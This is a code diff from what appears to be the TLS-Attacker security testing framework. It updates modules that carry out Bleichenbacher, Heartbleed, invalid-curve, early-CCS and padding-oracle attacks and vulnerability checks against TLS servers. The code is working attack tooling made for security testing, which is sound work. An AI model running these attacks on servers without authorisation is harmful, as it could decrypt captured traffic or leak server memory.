tls-attacker
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/Main.java‎
Lines changed: 13 additions & 10 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/Main.java‎
Lines changed: 13 additions & 10 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/BleichenbacherCommandConfig.java‎
Lines changed: 7 additions & 1 deletion b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/BleichenbacherCommandConfig.java‎
Lines changed: 7 additions & 1 deletion
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/InvalidCurveAttackConfig.java‎
Lines changed: 9 additions & 0 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/InvalidCurveAttackConfig.java‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/BleichenbacherAttacker.java‎
Lines changed: 2 additions & 3 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/BleichenbacherAttacker.java‎
Lines changed: 2 additions & 3 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/Cve20162107Attacker.java‎
Lines changed: 5 additions & 5 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/Cve20162107Attacker.java‎
Lines changed: 5 additions & 5 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/EarlyCCSAttacker.java‎
Lines changed: 5 additions & 10 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/EarlyCCSAttacker.java‎
Lines changed: 5 additions & 10 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/HeartbleedAttacker.java‎
Lines changed: 20 additions & 21 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/HeartbleedAttacker.java‎
Lines changed: 20 additions & 21 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/InvalidCurveAttacker.java‎
Lines changed: 27 additions & 8 deletions b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/InvalidCurveAttacker.java‎
Lines changed: 27 additions & 8 deletions
diff --git a/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/Lucky13Attacker.java‎
Lines changed: 0 additions & 1 deletion b/‎Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/Lucky13Attacker.java‎
Lines changed: 0 additions & 1 deletion
@@ -62,8 +62,9 @@ public static void main(String[] args) {
         jc.addCommand(InvalidCurveAttackConfig.ATTACK_COMMAND, ellipticTest);
         HeartbleedCommandConfig heartbleed = new HeartbleedCommandConfig(generalDelegate);
         jc.addCommand(HeartbleedCommandConfig.ATTACK_COMMAND, heartbleed);
-        Lucky13CommandConfig lucky13 = new Lucky13CommandConfig(generalDelegate);
-        jc.addCommand(Lucky13CommandConfig.ATTACK_COMMAND, lucky13);
+        // Lucky13CommandConfig lucky13 = new
+        // Lucky13CommandConfig(generalDelegate);
+        // jc.addCommand(Lucky13CommandConfig.ATTACK_COMMAND, lucky13);
         PaddingOracleCommandConfig paddingOracle = new PaddingOracleCommandConfig(generalDelegate);
         jc.addCommand(PaddingOracleCommandConfig.ATTACK_COMMAND, paddingOracle);
         TLSPoodleCommandConfig tlsPoodle = new TLSPoodleCommandConfig(generalDelegate);
@@ -78,8 +79,10 @@ public static void main(String[] args) {
         jc.addCommand(PoodleCommandConfig.ATTACK_COMMAND, poodle);
         SimpleMitmProxyCommandConfig simpleMitmProxy = new SimpleMitmProxyCommandConfig(generalDelegate);
         jc.addCommand(SimpleMitmProxyCommandConfig.ATTACK_COMMAND, simpleMitmProxy);
-        TokenBindingMitmCommandConfig tokenBindingMitm = new TokenBindingMitmCommandConfig(generalDelegate);
-        jc.addCommand(TokenBindingMitmCommandConfig.ATTACK_COMMAND, tokenBindingMitm);
+        // TokenBindingMitmCommandConfig tokenBindingMitm = new
+        // TokenBindingMitmCommandConfig(generalDelegate);
+        // jc.addCommand(TokenBindingMitmCommandConfig.ATTACK_COMMAND,
+        // tokenBindingMitm);
         jc.parse(args);
         if (generalDelegate.isHelp() || jc.getParsedCommand() == null) {
             if (jc.getParsedCommand() == null) {
@@ -100,9 +103,9 @@ public static void main(String[] args) {
             case HeartbleedCommandConfig.ATTACK_COMMAND:
                 attacker = new HeartbleedAttacker(heartbleed);
                 break;
-            case Lucky13CommandConfig.ATTACK_COMMAND:
-                attacker = new Lucky13Attacker(lucky13);
-                break;
+            // case Lucky13CommandConfig.ATTACK_COMMAND:
+            // attacker = new Lucky13Attacker(lucky13);
+            // break;
             case TLSPoodleCommandConfig.ATTACK_COMMAND:
                 attacker = new TLSPoodleAttacker(tlsPoodle);
                 break;
@@ -128,9 +131,9 @@ public static void main(String[] args) {
             case SimpleMitmProxyCommandConfig.ATTACK_COMMAND:
                 attacker = new SimpleMitmProxy(simpleMitmProxy);
                 break;
-            case TokenBindingMitmCommandConfig.ATTACK_COMMAND:
-                attacker = new TokenBindingMitm(tokenBindingMitm);
-                break;
+            // case TokenBindingMitmCommandConfig.ATTACK_COMMAND:
+            // attacker = new TokenBindingMitm(tokenBindingMitm);
+            // break;
             default:
                 throw new ConfigurationException("Command not found");
         }
 
@@ -49,9 +49,11 @@ public class BleichenbacherCommandConfig extends AttackConfig {
             + "exchange message. You can retrieve this message from the Wireshark traffic. Find the client key exchange "
             + "message, right click on the \"EncryptedPremaster\" value and copy this value as a Hex Stream.")
     private String encryptedPremasterSecret;
-
     @Parameter(names = "-type", description = "Type of the Bleichenbacher Test results in a different number of server test quries")
     private Type type = Type.FAST;
+    @Parameter(names = "-msgPkcsConform", description = "Used by the real Bleichenbacher attack. Indicates whether the original "
+            + "message that we are going to decrypt is PKCS#1 conform or not (more precisely, whether it starts with 0x00 0x02.")
+    private boolean msgPkcsConform = true;
 
     public BleichenbacherCommandConfig(GeneralDelegate delegate) {
         super(delegate);
@@ -115,4 +117,8 @@ public String getEncryptedPremasterSecret() {
         return encryptedPremasterSecret;
     }
 
+    public boolean isMsgPkcsConform() {
+        return msgPkcsConform;
+    }
+
 }
@@ -169,8 +169,17 @@ public Config createConfig() {
         Config config = super.createConfig();
         List<CipherSuite> cipherSuites = new LinkedList<>();
         cipherSuites.add(CipherSuite.TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA);
+        cipherSuites.add(CipherSuite.TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256);
+        cipherSuites.add(CipherSuite.TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA);
+        cipherSuites.add(CipherSuite.TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384);
         cipherSuites.add(CipherSuite.TLS_ECDH_RSA_WITH_AES_128_CBC_SHA);
+        cipherSuites.add(CipherSuite.TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256);
+        cipherSuites.add(CipherSuite.TLS_ECDH_RSA_WITH_AES_256_CBC_SHA);
+        cipherSuites.add(CipherSuite.TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384);
+        config.setAddECPointFormatExtension(true);
+        config.setAddEllipticCurveExtension(true);
         config.setDefaultClientSupportedCiphersuites(cipherSuites);
+        config.setDefaultSelectedCipherSuite(CipherSuite.TLS_ECDH_RSA_WITH_AES_128_CBC_SHA);
         List<NamedCurve> namedCurves = new LinkedList<>();
         namedCurves.add(namedCurve);
         config.setNamedCurves(namedCurves);
 
@@ -13,7 +13,6 @@
 import de.rub.nds.modifiablevariable.util.ArrayConverter;
 import de.rub.nds.tlsattacker.attacks.config.BleichenbacherCommandConfig;
 import de.rub.nds.tlsattacker.attacks.pkcs1.Bleichenbacher;
-import de.rub.nds.tlsattacker.attacks.pkcs1.Manger;
 import de.rub.nds.tlsattacker.attacks.pkcs1.PKCS1VectorGenerator;
 import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.RealDirectMessagePkcs1Oracle;
 import de.rub.nds.tlsattacker.core.config.Config;
@@ -82,13 +81,13 @@ public void executeAttack() {
         byte[] pms = ArrayConverter.hexStringToByteArray(config.getEncryptedPremasterSecret());
         if ((pms.length * 8) != publicKey.getModulus().bitLength()) {
             throw new ConfigurationException("The length of the encrypted premaster secret you have "
-                    + "is not equal to the server public key length. Have you selected the correct " + "value?");
+                    + "is not equal to the server public key length. Have you selected the correct value?");
         }
 
         RealDirectMessagePkcs1Oracle oracle = new RealDirectMessagePkcs1Oracle(publicKey, tlsConfig,
                 config.getValidResponseContent(), config.getInvalidResponseContent());
 
-        Bleichenbacher attacker = new Bleichenbacher(pms, oracle, true);
+        Bleichenbacher attacker = new Bleichenbacher(pms, oracle, config.isMsgPkcsConform());
         attacker.attack();
         BigInteger solution = attacker.getSolution();
 
 
@@ -62,7 +62,6 @@ public void executeAttack() {
 
     private Boolean executeAttackRound(ProtocolVersion version, CipherSuite suite) {
         Config tlsConfig = config.createConfig();
-        State state = new State(tlsConfig);
 
         List<CipherSuite> suiteList = new LinkedList<>();
         suiteList.add(suite);
@@ -95,7 +94,7 @@ private Boolean executeAttackRound(ProtocolVersion version, CipherSuite suite) {
         messages.add(alertMessage);
         action.setExpectedMessages(messages);
         tlsConfig.setWorkflowTrace(trace);
-
+        State state = new State(tlsConfig, trace);
         WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
                 tlsConfig.getWorkflowExecutorType(), state);
 
@@ -108,7 +107,8 @@ private Boolean executeAttackRound(ProtocolVersion version, CipherSuite suite) {
         // The Server has to answer to our ClientHello with a ServerHello
         // Message, else he does not support the offered Ciphersuite and
         // protocol version
-        if (WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SERVER_HELLO, trace)) {
+        if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SERVER_HELLO, trace)) {
+            LOGGER.info("Did not receive ServerHello. Skipping...");
             return false;
         }
         ProtocolMessage lm = WorkflowTraceUtil.getLastReceivedMessage(trace);
@@ -123,11 +123,11 @@ private Boolean executeAttackRound(ProtocolVersion version, CipherSuite suite) {
         }
 
         if (lm.getProtocolMessageType() == ProtocolMessageType.ALERT
-                && ((AlertMessage) lm).getDescription().getValue() == 22) {
+                && AlertDescription.getAlertDescription(((AlertMessage) lm).getDescription().getValue()) == AlertDescription.RECORD_OVERFLOW) {
             LOGGER.info("  Vulnerable");
             return true;
         } else {
-            LOGGER.info("  Not Vulnerable / Not supported");
+            LOGGER.info(suite.name() + " - " + version.name() + ": Not Vulnerable / Not supported");
             return false;
         }
     }
 
@@ -30,8 +30,6 @@
 import org.apache.logging.log4j.Logger;
 
 /**
- * TODO: currently does not work correctly, will be fixed after some
- * refactorings.
  *
  * @author Juraj Somorovsky (juraj.somorovsky@rub.de)
  */
@@ -58,8 +56,7 @@ public void executeAttack() {
     public Boolean isVulnerable() {
         Config tlsConfig = config.createConfig();
         tlsConfig.setDefaultTimeout(1000);
-
-        WorkflowTrace workflowTrace = new WorkflowTrace();
+        WorkflowTrace workflowTrace = new WorkflowTrace(tlsConfig);
         workflowTrace.addTlsAction(new SendAction(new ClientHelloMessage(tlsConfig)));
         List<ProtocolMessage> messageList = new LinkedList<>();
         messageList.add(new ServerHelloMessage(tlsConfig));
@@ -72,18 +69,16 @@ public Boolean isVulnerable() {
         messageList = new LinkedList<>();
         workflowTrace.addTlsAction(new ReceiveAction(messageList));
         tlsConfig.setWorkflowTrace(workflowTrace);
-
-        State state = new State(tlsConfig);
-        TlsContext tlsContext = state.getTlsContext();
+        State state = new State(tlsConfig, workflowTrace);
         WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
                 tlsConfig.getWorkflowExecutorType(), state);
 
         workflowExecutor.executeWorkflow();
-        if (tlsContext.isReceivedFatalAlert()) {
-            LOGGER.log(LogLevel.CONSOLE_OUTPUT, "Not vulnerable (probably), no Alert message found");
+        if (state.getTlsContext().isReceivedFatalAlert()) {
+            LOGGER.log(LogLevel.CONSOLE_OUTPUT, "Not vulnerable (probably), Alert message found");
             return false;
         } else {
-            LOGGER.log(LogLevel.CONSOLE_OUTPUT, "Vulnerable (probably), Alert message found");
+            LOGGER.log(LogLevel.CONSOLE_OUTPUT, "Vulnerable (probably), no Alert message found");
             return true;
         }
     }
 
@@ -15,6 +15,7 @@
 import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte;
 import de.rub.nds.tlsattacker.attacks.config.HeartbleedCommandConfig;
 import de.rub.nds.tlsattacker.core.config.Config;
+import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
 import de.rub.nds.tlsattacker.core.constants.ProtocolMessageType;
 import de.rub.nds.tlsattacker.core.exceptions.WorkflowExecutionException;
 import de.rub.nds.tlsattacker.core.protocol.message.HeartbeatMessage;
@@ -23,6 +24,9 @@
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
+import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
+import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
+import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 
@@ -48,42 +52,37 @@ public void executeAttack() {
     @Override
     public Boolean isVulnerable() {
         Config tlsConfig = config.createConfig();
-        State state = new State(tlsConfig);
-
-        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
-                tlsConfig.getWorkflowExecutorType(), state);
-
-        WorkflowTrace trace = state.getWorkflowTrace();
-
+        WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createHandshakeWorkflow();
+        HeartbeatMessage message = new HeartbeatMessage(tlsConfig);
+        trace.addTlsAction(new SendAction(message));
+        trace.addTlsAction(new ReceiveAction(new HeartbeatMessage()));
+        State state = new State(tlsConfig, trace);
         ModifiableByte heartbeatMessageType = new ModifiableByte();
         ModifiableInteger payloadLength = new ModifiableInteger();
         payloadLength.setModification(IntegerModificationFactory.explicitValue(config.getPayloadLength()));
         ModifiableByteArray payload = new ModifiableByteArray();
         payload.setModification(ByteArrayModificationFactory.explicitValue(new byte[] { 1, 3 }));
-        HeartbeatMessage hb = (HeartbeatMessage) WorkflowTraceUtil.getFirstSendMessage(ProtocolMessageType.HEARTBEAT,
-                trace);
-        hb.setHeartbeatMessageType(heartbeatMessageType);
-        hb.setPayload(payload);
-        hb.setPayloadLength(payloadLength);
+        message.setHeartbeatMessageType(heartbeatMessageType);
+        message.setPayload(payload);
+        message.setPayloadLength(payloadLength);
 
         try {
+            WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
+                    tlsConfig.getWorkflowExecutorType(), state);
             workflowExecutor.executeWorkflow();
         } catch (WorkflowExecutionException ex) {
             LOGGER.info("The TLS protocol flow was not executed completely, follow the debug messages for more information.");
             LOGGER.debug(ex);
         }
 
-        if (trace.executedAsPlanned()) {
-            LOGGER.info("Could not execute Workflow correctly. Check the Debug log");
+        if (WorkflowTraceUtil.didReceiveMessage(ProtocolMessageType.HEARTBEAT, trace)) {
+            LOGGER.info("Vulnerable. The server responds with a heartbeat message, although the client heartbeat message contains an invalid Length value");
+            return true;
+        } else if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.FINISHED, trace)) {
             return null;
         } else {
-            if (WorkflowTraceUtil.didReceiveMessage(ProtocolMessageType.HEARTBEAT, trace)) {
-                LOGGER.info("Vulnerable. The server responds with a heartbeat message, although the client heartbeat message contains an invalid Length value");
-                return true;
-            } else {
-                LOGGER.info("(Most probably) Not vulnerable. The server does not respond with a heartbeat message, it is not vulnerable");
-                return false;
-            }
+            LOGGER.info("(Most probably) Not vulnerable. The server does not respond with a heartbeat message, it is not vulnerable");
+            return false;
         }
     }
 }
@@ -17,17 +17,24 @@
 import de.rub.nds.tlsattacker.attacks.ec.ICEAttacker;
 import de.rub.nds.tlsattacker.attacks.ec.oracles.RealDirectMessageECOracle;
 import de.rub.nds.tlsattacker.core.config.Config;
+import de.rub.nds.tlsattacker.core.constants.AlgorithmResolver;
 import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
+import de.rub.nds.tlsattacker.core.constants.KeyExchangeAlgorithm;
 import de.rub.nds.tlsattacker.core.crypto.ec.Curve;
 import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
 import de.rub.nds.tlsattacker.core.exceptions.WorkflowExecutionException;
+import de.rub.nds.tlsattacker.core.protocol.message.AlertMessage;
+import de.rub.nds.tlsattacker.core.protocol.message.ChangeCipherSpecMessage;
 import de.rub.nds.tlsattacker.core.protocol.message.ECDHClientKeyExchangeMessage;
+import de.rub.nds.tlsattacker.core.protocol.message.FinishedMessage;
 import de.rub.nds.tlsattacker.core.state.State;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
-import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
+import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
+import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
+import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
 import java.math.BigInteger;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
@@ -59,10 +66,20 @@ public void executeAttack() {
 
     @Override
     public Boolean isVulnerable() {
+        if (!KeyExchangeAlgorithm.isEC(AlgorithmResolver.getKeyExchangeAlgorithm(config.createConfig()
+                .getDefaultSelectedCipherSuite()))) {
+            LOGGER.info("The CipherSuite that should be tested is not an Ec one:"
+                    + config.createConfig().getDefaultSelectedCipherSuite().name());
+            return null;
+        }
         for (int i = 0; i < getConfig().getProtocolFlows(); i++) {
             try {
                 WorkflowTrace trace = executeProtocolFlow();
-                if (WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.FINISHED, trace)) {
+                if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SERVER_HELLO, trace)) {
+                    LOGGER.info("Did not receive ServerHello. Check your config");
+                    return null;
+                }
+                if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.FINISHED, trace)) {
                     LOGGER.info("Received no finished Message in Protocolflow:" + i);
                 } else {
                     LOGGER.info("Received a finished Message in Protocolflow: " + i + "! Server is vulnerable!");
@@ -77,14 +94,15 @@ public Boolean isVulnerable() {
 
     private WorkflowTrace executeProtocolFlow() {
         Config tlsConfig = config.createConfig();
-        tlsConfig.setWorkflowTraceType(WorkflowTraceType.HANDSHAKE);
-        State state = new State(tlsConfig);
-
+        WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createHelloWorkflow();
+        trace.addTlsAction(new SendAction(new ECDHClientKeyExchangeMessage(tlsConfig), new ChangeCipherSpecMessage(
+                tlsConfig), new FinishedMessage(tlsConfig)));
+        trace.addTlsAction(new ReceiveAction(new AlertMessage(tlsConfig)));
+        State state = new State(tlsConfig, trace);
         WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
                 tlsConfig.getWorkflowExecutorType(), state);
-        WorkflowTrace trace = state.getWorkflowTrace();
-        ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage) WorkflowTraceUtil
-                .getFirstReceivedMessage(HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
+        ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage) WorkflowTraceUtil.getFirstSendMessage(
+                HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
 
         // modify public point base X coordinate
         ModifiableBigInteger x = ModifiableVariableFactory.createBigIntegerModifiableVariable();
@@ -99,6 +117,7 @@ private WorkflowTrace executeProtocolFlow() {
         ModifiableByteArray pms = ModifiableVariableFactory.createByteArrayModifiableVariable();
         byte[] explicitePMS = BigIntegers.asUnsignedByteArray(config.getCurveFieldSize(), config.getPremasterSecret());
         pms.setModification(ByteArrayModificationFactory.explicitValue(explicitePMS));
+        message.prepareComputations();
         message.getComputations().setPremasterSecret(pms);
         workflowExecutor.executeWorkflow();
         return trace;
 
@@ -78,7 +78,6 @@ private void createMonaFile(String fileName, String[] delimiters, List<Long> res
 
     public void executeAttackRound(Record record) throws IOException {
         Config tlsConfig = config.createConfig();
-
         State state = new State(tlsConfig);
         TlsContext tlsContext = state.getTlsContext();